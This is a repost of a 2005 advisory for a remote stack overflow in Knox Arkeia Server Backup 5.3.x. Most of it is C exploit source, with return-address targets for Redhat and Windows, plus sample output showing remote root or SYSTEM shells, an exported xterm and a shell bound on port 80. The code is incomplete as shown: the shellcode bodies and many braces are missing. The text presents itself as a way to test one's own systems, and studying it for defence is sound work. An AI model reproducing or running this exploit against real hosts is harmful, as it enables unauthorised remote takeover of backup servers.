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Knox Arkeia Server Backup Stack Overflow
来源:guldens111@hotmail.com 作者:John 发布时间:2005-02-23  

Knox Arkeia Server Backup Stack Overflow

"Arkeia offers established backup solutions for departments and mid-size businesses utilizing Linux."

A remote stack overflow in Arkedia Backup Server allows an attacker to run arbitrary code on a vulnerable machine. The following exploit codes can be used to test your system for the mentioned vulnerability.

The information has been provided by John Doe.

Vulnerable Systems:
* Knox Arkeia Server Backup version 5.3.x for Linux, Solaris, MacOSX and Windows

Exploit Code (C Code):
* Knox Arkiea Server Backup
* arkiead local/remote root exploit
* Targets for Redhat 7.2/8.0, Win2k SP2/SP3/SP4, WinXP SP1, Win 2003 EE
* Works up to current version 5.3.x
* ---------------
* Linux x86:
* ./arksink2 <arkeia_host> <target_type> <display>
* Exports an xterm to the box of your choosing. Make sure to "xhost +" on
* the box you're exporting to.
* A stack overflow is in the processing of a type 77 request. EIP is actually
* overwritten at 64 bytes, but the trailing NULL scrambled a pointer so we
* have to write past EIP and insert a "safe" value. Put this value behind your
* NOP+sc return address so it doesn't mess with the sled.
* Since the buffer is so small, we initially send an invalid packet that ends
* up on the heap a second before the overflow happens. If it is a high traffic
* Arkeia server the heap might be a bit volatile, so play around with putting
* nops+sc after the overwritten pointer. The heap method avoids non-exec stack
* protection, however.
* Includes targets for RH8 and RH7.2
* [user@host user]$ ./prog 1
* [*] Knox Arkeia <= v5.3.x remote root/SYSTEM exploit
* [*] Attacking LINUX system
* [*] Exporting xterm to
* [*] Connected to NOP+shellcode socket
* [*] Connected to overflow socket
* [*] Sending nops+shellcode
* [*] Done, sleeping
* [*] Done, check for xterm
* ---------------
* Windows x86:
* ./prog <host> <target> <offset>
* Spawns a shell on port 80 of the remote host
* EIP is overwritten beginning with the 25th byte after the header. Since Windows
* is little endian and has the heap mapped to 0x00XXXXXX we can avoid having to
* write an extra null past EIP. Another advantage here is that we can put all our
* nops and shellcode in the same packet, but after the NULL. They will not be copied
* onto the stack (and therefore not munge the pointer after it) but will remain
* in memory as a raw packet. Fire up ollydbg, search for your nops and voila.
* [user@host user]$ ./arksink2 3 0
* [*] Knox Arkeia <= v5.3.x remote SYSTEM exploit
* [*] Attacking Windows system
* [*] Spawning shell on
* [*] Connected to overflow socket
* [*] Sending overflow
* [*] Attempting to get remote shell, try #0
* [!] connect: Resolver Error 0 (no error)
* [*] Attempting to get remote shell, try #1
* [!] connect: Resolver Error 0 (no error)
* [*] Attempting to get remote shell, try #2
* [!] connect: Resolver Error 0 (no error)
* [*] Attempting to get remote shell, try #3
* [!] connect: Resolver Error 0 (no error)
* [*] Attempting to get remote shell, try #4
* [*] Success, enjoy
* Microsoft Windows 2000 [Version 5.00.2195]
* (C) Copyright 1985-2000 Microsoft Corp.
* C:\WINNT\system32>whoami
* whoami
* C:\WINNT\system32>
* ---------------

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/errno.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/nameser.h>

#define BUFLEN 10000 /* for readshell() */
#define DATA_LEN 1000 /* overflow packet data section */
#define HEAD_LEN 8 /* overflow packet header */
#define NOP_LEN 20000 /* nop+shellcode packet */
#define ARK_PORT 617 /* port Arkeiad listens on */
#define SHELL_PORT 80 /* for the windows shellcode */
#define NOP 0x90 /* Intel x86 */
#define NUMTARGS 5 /* increase when adding targets */
#define LINUX 1 /* Linux target type */
#define WINDOWS 2 /* Windows target type */

struct {
char *os;
unsigned int targret;
unsigned int targsafe;
unsigned int len;
int targtype;
} targets[] = {
{ "Redhat 8.0", 0x80ecf90, 0x080e0144, 68, LINUX },
{ "Redhat 7.2", 0x80eddc0, 0x080eb940, 68, LINUX },
{ "Windows 2k SP2, SP3, SP4", 0x007d2144, 0xdeadbeef, 28, WINDOWS },
{ "Windows 2003 EE", 0x007b2178, 0xdeadbeef, 28, WINDOWS },
{ "Windows XP SP1", 0x007d20e7, 0xdeadbeef, 28, WINDOWS },

// Linux shellcode exports xterm
const char shellcode[] =

// Windows shellcode binds shell to port 80
const char shellcode_win[] =

unsigned int resolve(char *hostname)
u_long ip = 0;
struct hostent *hoste;

if ((int)(ip = inet_addr(hostname)) == -1)
if ((hoste = gethostbyname(hostname)) == NULL)
herror("[!] gethostbyname");
memcpy(&ip, hoste->h_addr, hoste->h_length);

int isock(char *hostname, int portnum)
struct sockaddr_in sock_a;
int num, sock;
unsigned int ip;
fd_set input;

sock_a.sin_family = AF_INET;
sock_a.sin_port = htons(portnum);
sock_a.sin_addr.s_addr = resolve(hostname);

if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
herror("[!] accept");

if (connect(sock, (struct sockaddr *)&sock_a, sizeof(sock_a)))
herror("[!] connect");



int usage(char *progname)
int i;

fprintf(stderr, "Usage:\n%s hostname target_num display (attacking Linux)\n", progname);
fprintf(stderr, "%s hostname target_num offset (attacking Windows)\n", progname);
for (i = 0; targets[i].os; i++)
fprintf(stderr, "Target %d: %s\n", i+1, targets[i].os);
fprintf(stderr, "Example: %s 1\n", progname);

int getshell(int sock)
char buf[BUFLEN];
int nread=0;

fd_set input;


int lin(char *host, char *export, unsigned int tnum)
char head[] = "\x00\x4d\x00\x03\x00\x01\xff\xff";
char data[DATA_LEN];
char sc_req[NOP_LEN*2];
char *sc;
unsigned int retaddr;
unsigned int safe;
int datalen = 0;
int port = ARK_PORT;
int sock_overflow, sock_nops;
int i;
int nullmap = 0;

sock_overflow = sock_nops = 0;

retaddr = targets[tnum].targret;
safe = targets[tnum].targsafe;
datalen = targets[tnum].len;

sock_nops = isock(host, port);

if (sock_nops < 1)
fprintf(stderr, "[*] Connected to %s:%d NOP+shellcode socket\n", host, port);

sock_overflow = isock(host, port);
if (sock_overflow < 1)
fprintf(stderr, "[*] Connected to %s:%d overflow socket\n", host, port);

// build data section of overflow packet
memset(data, NOP, DATA_LEN);

// copy in return address
memcpy(data+datalen - 8, (char *)&retaddr, 4);
// we overwrite a pointer that must be a valid address
memcpy(data+datalen-4, (char *)&safe, 4);

datalen = ntohs(datalen);
memcpy(head+6, (char *)&datalen, 2);

// build invalid packet with nops+shellcode
memset(sc_req, NOP, NOP_LEN+1);
sc = (char *)malloc(strlen(shellcode) + strlen(export) + 2);
sprintf(sc, "%s%s%s", shellcode, export, "K");
if (strlen(sc) + NOP_LEN > NOP_LEN*2-1)
fprintf(stderr, "[!] display name too long\n");

memcpy(sc_req+NOP_LEN, sc, strlen(sc));

// send invalid nop+shellcode packet
fprintf(stderr, "[*] Sending nops+shellcode\n");
write(sock_nops, sc_req, NOP_LEN+strlen(sc)+1);
fprintf(stderr, "[*] Done, sleeping\n");

// send overflow, pointing EIP to above nops+sc
write(sock_overflow, head, HEAD_LEN); // 8 byte header
datalen = ntohs(datalen);
fprintf(stderr, "[*] Sending overflow\n");
write(sock_overflow, data, datalen); // small overflow packet
fprintf(stderr, "[*] Done, check for xterm\n");

void windows (char *host, int tnum, int offset)
char head[] = "\x00\x4d\x00\x03\x00\x01\xff\xff";
char data[DATA_LEN];
char sc_req[NOP_LEN*2];
char *sc;
char *export;
unsigned int ret;
unsigned int safeaddr;
int overflow_len;
int datasiz = DATA_LEN;
int datalen = 0;
int port = ARK_PORT;
int sock_overflow, sock_nops, sock_shell;
int i;

datalen = targets[tnum].len;
ret = targets[tnum].targret + offset;
sock_overflow = isock(host, port);
if (sock_overflow < 1)
fprintf(stderr, "[*] Connected to %s:%d overflow socket\n", host, port);

// build data section of overflow packet
memset(data, NOP, DATA_LEN);
memcpy(data+datalen - 4, (char *)&ret, 4);
memcpy(data+DATA_LEN-strlen(shellcode_win)-1, shellcode_win, strlen(shellcode_win));

// put size into header
datasiz = ntohs(datasiz);
memcpy(head+6, (char *)&datasiz, 2);

fprintf(stderr, "[*] Sending overflow\n");
write(sock_overflow, head, HEAD_LEN); // 8 byte header
write(sock_overflow, data, DATA_LEN); // large data section

for (i = 0; i < 20; i++)
fprintf(stderr, "[*] Attempting to get remote shell, try #%d\n", i);
// connect to shell
sock_shell = isock(host, SHELL_PORT);
if (sock_shell > 0)
fprintf(stderr, "[*] Success, enjoy\n");

fprintf(stderr, "[!] Exploit failed or cannot connect to port 80\n");

int main( int argc, char **argv)
/* first 2 bytes are a type 77 request */
/* last two bytes length */
char *host;
char *export;
unsigned int tnum;
int datalen = 0;
int offset = 0;

if (argc == 4)
host = argv[1];
tnum = atoi(argv[2]);

if (targets[tnum].targtype == LINUX)
export = argv[3];

if (tnum > NUMTARGS || tnum == 0)
fprintf(stderr, "[!] Invalid target\n");


fprintf(stderr, "[*] Knox Arkeia <= v5.3.x remote root/SYSTEM exploit\n");
fprintf(stderr, "[*] Attacking %s system\n", targets[tnum].os);

if (targets[tnum].targtype == LINUX )
fprintf(stderr, "[*] Exporting xterm to %s\n", export);
lin(host, export, tnum);
else if (targets[tnum].targtype == WINDOWS)
fprintf(stderr, "[*] Spawning shell on %s:%d\n", host, SHELL_PORT);
windows(host, tnum, offset);
fprintf(stderr, "[!] Unknown target type: %d\n", targets[tnum].targtype);

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